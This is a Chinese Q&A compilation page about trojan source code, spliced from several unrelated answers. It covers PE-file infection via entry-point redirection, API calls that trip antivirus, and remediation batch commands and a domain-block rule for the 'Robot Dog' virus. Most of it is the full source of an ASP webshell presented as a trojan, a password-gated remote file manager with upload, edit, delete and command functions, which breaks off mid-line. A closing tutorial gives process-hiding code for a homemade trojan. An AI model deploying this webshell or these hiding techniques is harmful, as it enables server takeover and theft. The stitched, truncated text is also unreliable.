木馬c源碼
A. c語言木馬源代碼
ls這個好像是感染c文件的病毒,自動加上玩笑代碼(當然可以是惡意的) 
不是木馬
B. 請介紹下C語言寫木馬的演算法......
我只知道window的木馬程序的原理,首先你要去研究一下windows PE文件的格式,windows PE文件包括(exe dll文件等),用文本方式打開任意一個exe或者dll文件,就會發現這些文件都具有類似的組織結構(就是PE格式) 
仔細耐心地研究了PE格式後,你會發現這些PE格式的文件有很多間隙空間可用,window木馬程序正是利用PE格式文件中的這些間隙,把自己的代碼插入這些間隙空間中,同時還要修改宿主程序的入口地址(OEP Original Entry Point) 
這樣,宿主程序一運行,首先運行生成木馬的代碼,然後運行宿主程序。 
Windows應用程序捆綁核心編程 (PE) 
http://book.csdn.net/bookfiles/212/10021210198.shtml
http://www.diybl.com/course/3_program/c++/cppjs/2008219/100330.html
C. C語言簡單的木馬,最簡單的。就是要360殺毒軟體能查出來的那種最簡單的。發源碼。不要叫我上百度搜索
如果你用VC編譯器的話,嘗試一下使用SetWindowsHookEx和CreateRemoteThread兩個函數,360應該會報毒。
D. 誰有機器狗木馬病毒的C語言程序代碼
計算機病毒「機器狗」
機器狗的生前身後,曾經有很多人說有穿透還原卡、冰點的病毒,但是在各個論壇都沒有樣本證據,直到2007年8月29日終於有人在社區里貼出了一個樣本。這個病毒沒有名字,圖標是SONY的機器狗阿寶,就像前輩熊貓燒香一樣,大家給它起了個名字叫機器狗。 
工作原理 
機器狗本身會釋放出一個pcihdd.sys到drivers目錄,pcihdd.sys是一個底層硬碟驅動,提高自己的優先順序接替還原卡或冰點的硬碟驅動,然後訪問指定的網址,這些網址只要連接就會自動下載大量的病毒與惡意插件。然後修改接管啟動管理器,最可怕的是,會通過內部網路傳播,一台中招,能引發整個網路的電腦全部自動重啟。 
重點是,一個病毒,如果以hook方式入侵系統,接替硬碟驅動的方式效率太低了,而且毀壞還原的方式這也不是最好的,還有就是這種技術應用范圍非常小,只有還原技術廠商范圍內有傳播,在這方面國際上也只有中國在用,所以,很可能就是行業內杠。 
對於網吧而言,機器狗就是劍指網吧而來,針對所有的還原產品設計,可預見其破壞力很快會超過熊貓燒香。好在現在很多免疫補丁都以出現,發稿之日起,各大殺毒軟體都以能查殺。 
免疫補丁之爭 
現在的免疫補丁之數是疫苗形式,以無害的樣本復制到drivers下,欺騙病毒以為本身以運行,起到阻止危害的目的。這種形式的問題是,有些用戶為了自身安全會在機器上運行一些查毒程序(比如QQ醫生之類)。這樣疫苗就會被誤認為是病毒,又要廢很多口舌。 
解決之道 
最新的解決方案是將system32/drivers目錄單獨分配給一個用戶,而不賦予administror修改的許可權。雖然這樣能解決,但以後安裝驅動就是一件頭疼的事了。 
來徹底清除該病毒,處理後重啟一下電腦就可以了,之前要打上補丁! 
或者這樣: 
1注冊表,組策略中禁止運行userinit.exe 進程 
2 在啟動項目中加入批處理 
A : 強制結束userinit.exe進程 Taskkill /f /IM userinit.exe (其中「/IM」參數後面為進程的圖像名,這命令只對XP用戶有效) 
B : 強制刪除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe 
C : 創建userinit.exe免疫文件到%SystemRoot%\system32\ 
命令:md %SystemRoot%\system32\userinit.exe >nul 2>nul 
或者 md %SystemRoot%\system32\userinit.exe 
attrib +s +r +h +a %SystemRoot%\system32\userinit.exe 
D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f 
userinit1.exe是正常文件改了名字,多加了一個1,你也可以自己修改,不過要手動修改這4個注冊表,並導出,這個批處理才能正常使用。 
最新動向 
好像機器狗的開發以停止了,從樣本放出到現在也沒有新的版本被發現,這到讓我們非常擔心,因為雖著研究的深入,現在防禦的手段都是針對病毒工作原理的,一但機器狗開始更新,稍加改變工作原理就能大面積逃脫普遍的防禦手段,看來機器狗的爆發只是在等待,而不是大家可以高枕了。 
目前網上流傳一種叫做機器狗的病毒,此病毒採用hook系統的磁碟設備棧來達到穿透目的的,危害極大,可穿透目前技術條件下的任何軟體硬體還原!基本無法靠還原抵擋。目前已知的所有還原產品,都無法防止這種病毒的穿透感染和傳播。 
機器狗是一個木馬下載器,感染後會自動從網路上下載木馬、病毒,危及用戶帳號的安全。 
機器狗運行後會釋放一個名為PCIHDD.SYS的驅動文件,與原系統中還原軟體驅動進行硬碟控制權的爭奪,並通過替換userinit.exe文件,實現開機啟動。 
>> 那麼如何識別是否已中毒呢? 
是否中了機器狗的關鍵就在 Userinit.exe 文件,該文件在系統目錄的 system32 文件夾中,點擊右鍵查看屬性,如果在屬性窗口中看不到該文件的版本標簽的話,說明已經中了機器狗。如果有版本標簽則正常。 
臨時解決辦法: 
一是在路由上封IP: 
ROS腳本,要的自己加上去 
/ ip firewall filter 
add chain=forward content=yu.8s7.net action=reject comment="DF6.0" 
add chain=forward content= action=reject 
二是在c:\windows\system32\drivers下建立免疫文件: pcihdd.sys , 
三是把他要修改的文件在做母盤的時候,就加殼並替換。 
在%systemroot%\system32\drivers\目錄下 建立個 明字 為 pcihdd.sys 的文件夾 設置屬性為 任何人禁止 
批處理 
md %systemroot%\system32\drivers\pcihdd.sys 
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n 
cacls %systemroot%\system32\userinit.exe /e /p everyone:r 
exit 
目前,網路流行以下解決方法,或者可以在緊急情況下救急: 
1、首先在系統system32下復制個無毒的userinit.exe,文件名為FUCKIGM.exe(文件名可以任意取),這就是下面批處理要指向執行的文件!也就是開機啟動userinit.exe的替代品!而原來的userinit.exe保留!其實多復制份的目的只是為了多重保險!可能對防止以後變種起到一定的作用。 
2、創建個文件名為userinit.bat的批處理(文件名也可任意取,但要和下面說到的注冊表鍵值保持一致即可),內容如下: 
start FUCKIGM.exe (呵呵,夠簡單吧?) 
3、修改注冊表鍵值,將userinit.exe改為userinit.bat。內容如下: 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"Userinit"="C:\\WINDOWS\\system32\\userinit.bat," 
就這3步,讓這條狗再也凶不起來!這是在windows 2003測試的,雙擊機器狗後,沒什麼反應,對比批處理也是正常,即這狗根本沒改動它!開關機游戲均無異常!但唯一美中不足的是,採用經典模式開機的啟動時會出現個一閃而過的黑框!
E. 木馬程序源碼
一個asp木馬:
<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上傳程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.to dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上級目錄</font></a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
table{ font-family: 宋體; font-size: 9pt }
a{ font-family: 宋體; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋體; color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td { font-size: 9pt}
a { color: #000000; text-decoration: none}
a:hover { text-decoration: underline}
.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}
.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}
-->
</style>
</head>
<script language="javaScript">
function crfile(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='"& urlpath & lpath & xName &"' target='_blank'><strong>" & showstring & "</strong></a></td><td width='20%' align='right'>" & size & "位元組</td><td width='30%'><a href='#' title='類型:" & type1 & chr(10) & "屬性:" & Attributes & chr(10) & "時間:" & DateLastModified &"'>屬性</a> <a href='<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>編輯</a> <a href="&chr(34)&"javascript: rmdir1('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>刪除</a> <a href='#' onclick=file('" & lpath & Name & "')><font color='#FF8000' ></font>復制</a> <a href='<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>下載</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>└<font color='#FF8000'><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>刪除</a><br>"
end sub
sub rmdir1(ls)
if confirm("你真的要刪除這個文件嗎!"&Chr(13)&Chr(10)&"文件為:"&ls) then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmdir(ls)
if confirm("你真的要刪除這個目錄嗎!"&Chr(13)&Chr(10)&"目錄為:"&ls) then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub file(sfile)
dfile=InputBox("※文件復制※"&Chr(13)&Chr(10)&"源文件:"& sfile&Chr(13)&Chr(10)&"輸入目標文件的文件名:"&Chr(13)&Chr(10) &"[允許帶路徑,要根據你的當前路徑模式]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "對不起,你在相對路徑模式下不能使用絕對路徑"&Chr(13)&Chr(10)&"錯誤路徑:["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您沒有輸入文件名!"
end If
end sub
</script>
<body>
<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※換盤:<span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives
Response.write "<font face=Wingdings>:</font><a href='" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>"
NEXT
%> </span> 地址:
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※<%
if Request("attrib")="true" then
response.write "<a href='" & rseb & "?q=list.asp'>切到相對路徑</a>"
else
response.write "<a href='" & rseb & "?attrib=true&q=list.asp'>切到絕對路徑</a>"
end if
%> ※絕對:<span
style="background-color: rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※當前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>
</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">
編輯|
<input class="tx1" type="text" name="filename" size="20">
<input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">
<input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="tx1" style="width:100" value="">
<input type="text" name="filepath" class="tx1" style="width:100" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="tx" value="1">
<input class="tx1" type="submit" value="上傳">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="命令">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="配置">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">
</td>
</td>
</tr></form>
<tr>
<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>
</td>
<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>
</td>
</tr>
</table>
<%else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edit.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>編輯源代碼</title>
<style>
<!--
table{ font-family: 宋體; font-size: 12pt }
a{ font-family: 宋體; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋體; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<% '讀文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "<script>alert('刪除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile. dsfile
%>
<script language=vbscript>
msgbox "源文件:<%=whichfile%>" & vbcrlf & "目的文件:<%=dsfile%>" & vbcrlf & "復製成功!要刷新才能看到效果!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?q=edit.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"
width="700" cellpadding="0">
<tr>
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"
value="<%=Request("path")%> ">直接更改文件名,相當於「另存為」</td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"
value="提交" name="B1"><input type="reset" value="復原" name="B2"></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "<script>alert('修改成功!要刷新才能看到效果');window.close();</script>"
end if
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edir.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>目錄操作</title>
<style>
<!--
table{ font-family: 宋體; font-size: 12pt }
a{ font-family: 宋體; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋體; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<% '讀文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "<script>alert('刪除的目錄為:" & whichdir & "刪除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "<script>alert('建立的目錄為:" & whichdir & "建立成功!要刷新才能看到效果');window.close();</script>"
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "請輸入要上傳至的目錄!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize>
F. 哪裡有木馬源代碼分析啊 要詳解的 最好C語言編寫的
木馬是如何編寫的(一)
       
   特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷,使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。
 我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!呵呵,要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。
 自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成??伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
 首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎?
 啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMftp和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
 Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
 我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
 首先判斷目標機的操作系統是Win9x還是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
  { 
  typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
    file://定義RegisterServiceProcess()函數的原型
    HINSTANCE hDLL;
     LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
     hDLL = LoadLibrary("KERNEL32");
     file://載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
  lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
    file://得到RegisterServiceProcess()函數的地址
    lpRegisterServiceProcess(GetCurrentProcessId(),1);
     file://執行RegisterServiceProcess()函數,隱藏本進程
     FreeLibrary(hDLL);
     file://卸載動態鏈接庫
  }
}
